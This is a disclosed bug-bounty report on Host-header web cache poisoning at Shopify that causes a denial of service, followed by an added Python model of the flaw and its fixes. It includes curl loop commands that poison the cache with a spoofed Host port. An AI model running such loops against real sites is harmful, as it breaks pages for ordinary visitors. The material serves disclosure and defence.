Shopify: Host header web cache poisoning leads to DoS

ID H1:1096609
Type hackerone
Reporter g4mm4
Modified 2021-04-08T19:40:19


Hi there, I just found that the website: is infected with "Web cache poisoning" via the Host header, leading to Denial of Service. Abusing this bug, an attacker can:

Poison your cache with an HTTP Host header containing an arbitrary PORT which is not open. This attack may lead to Denial of Service.

How to reproduce the issue: In the 1st terminal, run a command like this:

$ while true; do curl -ik "" -H "Host:"|grep ":1337"; sleep 0;echo 1; done

In the 2nd terminal, run the command below to confirm whether this attack is successful or not:

$ while true; do curl -ik ""|grep ":1337"; done

The output from the command confirms my Host header poisoning worked:

$ while true; do curl -ik ""|grep ":1337"; done

(curl progress meter omitted; the lines matched by grep ":1337" begin with:)

<link rel="canonical" href="">
<li><div class="popover-wrapper js-popover-dropdown popover-wrapper--dropdown" data-position="bottom" data-align="left"><button type="button" class="popover__trigger marketing-nav__item marketing-nav__item--primary" itemprop="name">Collections ... </button><div class="popover"><div class="popover__content"><ul class="popover__list"><li><a href="/collections/trending-themes" class="marketing-nav__item marketing-nav__item--child" ...>Trending this week </a></li><li><a href="/collections/product-recommendations" ...

Finally, when a user visits the homepage:, many images, CSS files and links will not be loaded (because the appended port :1337 is not open). Please see the attached image for details.

Cheers,
~g4mm4

References: Denial of Services

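The mechanism behind the report, as an added example that is not part of the original report or of Shopify's code: a toy shared cache whose key is the request path only, fronting an origin that builds absolute asset URLs from the incoming Host header. One attacker request with `Host: <site>:1337` gets cached, and every later visitor receives a page whose assets point at the closed port. The same model shows the two independent fixes: include Host in the cache key, or have the origin reject unexpected Host values and build URLs from configuration. The host name `shop.example` and the helper names are assumptions for the example; port 1337 is the one from the report.

```python
# Added example (not from the HackerOne report): model of Host-header
# web cache poisoning and its two fixes. Host names are hypothetical.

CANONICAL_HOST = "shop.example"   # assumed: the host the origin should emit


def render_page(request_host: str) -> str:
    """Vulnerable origin: absolute URLs are built from the Host header."""
    return (
        f'<link rel="canonical" href="https://{request_host}/">'
        f'<link rel="stylesheet" href="https://{request_host}/assets/app.css">'
        f'<img src="https://{request_host}/assets/logo.png">'
    )


def render_page_hardened(request_host: str) -> str:
    """Fixed origin: allow-list the Host header and emit URLs from config,
    so a foreign host:port never reaches the response body."""
    if request_host != CANONICAL_HOST:
        raise ValueError(f"unexpected Host header: {request_host!r}")
    return render_page(CANONICAL_HOST)


class Cache:
    """Toy shared cache. key_on_host=False mirrors the reported behaviour:
    the cache key is the path alone, so Host is not part of it."""

    def __init__(self, key_on_host: bool, origin=render_page):
        self.key_on_host = key_on_host
        self.origin = origin
        self.store: dict = {}
        self.misses = 0

    def get(self, path: str, host: str) -> str:
        key = (path, host) if self.key_on_host else (path,)
        if key not in self.store:
            self.misses += 1
            try:
                self.store[key] = self.origin(host)
            except ValueError:
                return "400 Bad Request"   # rejected responses are never cached
        return self.store[key]


def run_attack(cache: Cache, victim_host: str = CANONICAL_HOST,
               poisoned_host: str = CANONICAL_HOST + ":1337") -> str:
    """Attacker's request goes first (the report's curl loop with a custom
    Host header); return what an ordinary visitor then gets for the path."""
    cache.get("/", poisoned_host)
    return cache.get("/", victim_host)


def is_poisoned(html: str, victim_host: str = CANONICAL_HOST) -> bool:
    """True when the page's asset URLs no longer point at the visitor's host."""
    return f"https://{victim_host}/" not in html


if __name__ == "__main__":
    scenarios = [
        ("path-only cache key, vulnerable origin", Cache(key_on_host=False)),
        ("Host in cache key, vulnerable origin", Cache(key_on_host=True)),
        ("path-only cache key, hardened origin",
         Cache(key_on_host=False, origin=render_page_hardened)),
    ]
    for label, cache in scenarios:
        page = run_attack(cache)
        print(f"{label}: poisoned={is_poisoned(page)}")
```

Only the first scenario yields a page whose stylesheet and image URLs carry `:1337`, which is exactly what the report's `grep ":1337"` loop is watching for. In production, keying the cache on Host alone is not sufficient if the origin also honours headers such as X-Forwarded-Host; the robust fix is the origin-side one, since it removes the reflected value from the cached body altogether.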